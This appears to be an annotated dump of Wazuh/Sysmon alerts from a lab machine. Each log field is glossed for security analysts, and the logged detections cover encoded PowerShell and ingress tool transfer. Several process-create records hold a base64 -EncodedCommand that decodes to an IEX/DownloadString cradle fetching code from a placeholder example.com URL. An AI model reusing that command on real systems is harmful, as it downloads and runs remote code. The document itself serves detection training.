data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:39.6375414Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:38.125
ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ProcessId: 12600
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ParentProcessId: 13524
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:38.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.920705 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:39.8247444Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282076 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:39.810
ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ProcessId: 12600
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dqe4bdg3.md4.ps1
CreationUtcTime: 2025-04-24 22:35:39.810
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:39.810 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dqe4bdg3.md4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:39.810 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.923473 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:42.1700560Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282122 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:40.387
ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ProcessId: 8756
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00}
ParentProcessId: 12600
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:40.387 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12600 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.931539 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:42.3980110Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282123 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:42.368
ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ProcessId: 8756
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_p2lp1iym.vuq.ps1
CreationUtcTime: 2025-04-24 22:35:42.368
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:42.368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_p2lp1iym.vuq.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:42.368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.934303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:44.7172103Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282169 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:43.049
ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ProcessId: 11892
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00}
ParentProcessId: 8756
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:43.049 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
